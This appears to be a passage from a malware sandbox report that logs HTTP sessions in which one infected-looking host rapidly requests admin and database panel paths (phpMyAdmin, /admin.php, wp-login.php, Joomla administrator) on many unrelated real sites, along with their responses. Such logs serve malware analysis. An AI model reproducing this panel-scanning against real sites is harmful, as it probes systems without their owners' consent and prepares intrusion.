                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
396 | 192.168.2.6 | 63063 | 34.149.46.130 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.181798935 CET | 180 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.284260035 CET | 209 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin.php
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
397 | 192.168.2.6 | 63065 | 31.13.65.1 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.181854010 CET | 170 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.283505917 CET204INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
398 | 192.168.2.6 | 63066 | 31.13.65.1 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.181900978 CET | 177 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.283644915 CET | 211 | IN | HTTP/1.1 301 Moved Permanently
Location: https://web.facebook.com/phpMyAdmin/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:07 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
399 | 192.168.2.6 | 63051 | 195.85.23.95 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.188736916 CET | 175 | OUT | GET /admin.php HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.413527012 CET | 681 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
x-zone: 3-reserve101-ded7160
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=MGzIcCHX4eKZdDwJDLWZxYq.eJQj2PLKrao.hMK0QLk-1707131767-1-AU9osYYGrdr2/kgnmMBLWJTNZX/3l+Z8EANxGU2bUm9wb1MeO4yIXLO1wblwe3Vwt7YTFtM8eBc26qPfWYy3O8E=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 850abd494a026783-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:16:07.413563013 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
400 | 192.168.2.6 | 63064 | 20.231.114.24 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.194691896 CET | 177 | OUT | GET /admin.php HTTP/1.1
Host: account.mojang.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.312316895 CET | 351 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.minecraft.net/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
401 | 192.168.2.6 | 63072 | 138.197.59.199 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.202028036 CET | 182 | OUT | GET /admin.php HTTP/1.1
Host: api.cmrsanmartin.ziz.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.320137024 CET | 560 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Location: https://api.cmrsanmartin.ziz.cl/admin.php
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/admin.php">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
402 | 192.168.2.6 | 63112 | 96.7.224.178 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.212187052 CET | 169 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.322809935 CET | 622 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 264
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131767264_1611129006_213793778_15_8964_103_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3bf2</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
403 | 192.168.2.6 | 63119 | 162.241.203.30 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.215114117 CET | 169 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.329125881 CET | 1114 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
404 | 192.168.2.6 | 62972 | 64.190.63.111 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.222122908 CET | 164 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.431880951 CET | 88 | IN | HTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
405 | 192.168.2.6 | 63055 | 103.224.182.210 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.225404978 CET | 173 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.384603977 CET | 341 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
set-cookie: __tad=1707131767.1194278; expires=Thu, 02-Feb-2034 11:16:07 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/pma/?sub1=20240205-2216-0720-8b5f-fc43330f6951
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
406 | 192.168.2.6 | 62973 | 195.248.251.103 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.227477074 CET | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: phonandroid.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.440109968 CET | 222 | IN | HTTP/1.1 301 Permanently moved
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: Varnish
X-Varnish: 7031829
X-Redirected-By: lxc-varnish-ressources-02
Location: https://www.phonandroid.com/phpmyadmin/
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
407 | 192.168.2.6 | 62723 | 103.90.225.70 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.229553938 CET | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: ngoalongvn.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.594291925 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
Feb 5, 2024 12:16:07.594326973 CET | 119 | IN | Data Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
408 | 192.168.2.6 | 62979 | 77.240.114.212 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.236495018 CET | 173 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: mw.redsa.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.454312086 CET | 437 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache
Location: https://mw.redsa.net/phpMyAdmin/
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/phpMyAdmin/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
409 | 192.168.2.6 | 63073 | 54.183.63.241 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.238615990 CET | 177 | OUT | GET /admin.php HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.426074982 CET | 1286 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Set-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
x-imvu-rnd: lojRQpAHBg
content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID  Source IP    Source Port  Destination IP  Destination Port
410         192.168.2.6  62962        177.74.1.157    80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.243396997 CET  179                OUT        GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.487854958 CET  116                IN         HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://sistemas.pa.gov.br/phpmyadmin/


Session ID  Source IP    Source Port  Destination IP  Destination Port
411         192.168.2.6  63129        104.21.14.245   80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.243447065 CET  168                OUT        GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.371228933 CET  1286               IN         HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2xtjoY%2Bq6xVLdfqYqsmnDYxYp8SBSIYWvjLVaMgEtPOaG0I%2B9KfzttJbnHyOnKHyPtD5vvqHIUSRYDLYghBFfklgCocaRML8bWJXNa%2FObp8bhVqxhB97hoeF13wXHh2YA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd499f1b677b-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port
412         192.168.2.6  63136        104.21.14.245   80
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.244282961 CET  169                OUT        GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.374108076 CET   1286               IN         HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WShCCdEuIoeCetWXsBDmiHGqYSfQsGOsaR5pdJeyJbadfBSi7w%2FXKID1Y16zzUK7qxGwUAJLV%2F4LZLr7Dufyfj0LPNMn93Qpr8Co4RmCopJsxj3JBVyMmp5m2oCYrXMqZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd499b504576-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port
413         192.168.2.6  63005        31.216.144.5    80
Timestamp                            Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.246171951 CET   169                OUT        GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.446106911 CET   160                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port
414         192.168.2.6  63010        178.16.128.181  80
Timestamp                            Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.246232033 CET   173                OUT        GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.440709114 CET   1016               IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 707
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://mobilsam.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port
415         192.168.2.6  62974        188.212.100.154  80
Timestamp                            Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.250261068 CET   172                OUT        GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.486197948 CET   1030               IN         HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
content-length: 795
date: Mon, 05 Feb 2024 11:17:33 GMT
server: LiteSpeed
location: https://zarkana2.ro/phpMyAdmin/
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port
416         192.168.2.6  62976        188.212.100.154  80

Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.251192093 CET  184                OUT        GET /administrator/index.php HTTP/1.1
Host: zarkana2.ro
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.486711979 CET  1042               IN         HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
content-length: 795
date: Mon, 05 Feb 2024 11:17:33 GMT
server: LiteSpeed
location: https://zarkana2.ro/administrator/index.php
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port
417         192.168.2.6  63001        185.120.71.24    80

Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.257843971 CET  185                OUT        GET /administrator/index.php HTTP/1.1
Host: analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.467638016 CET  393                IN         HTTP/1.1 301 Moved Permanently
Server: nginx
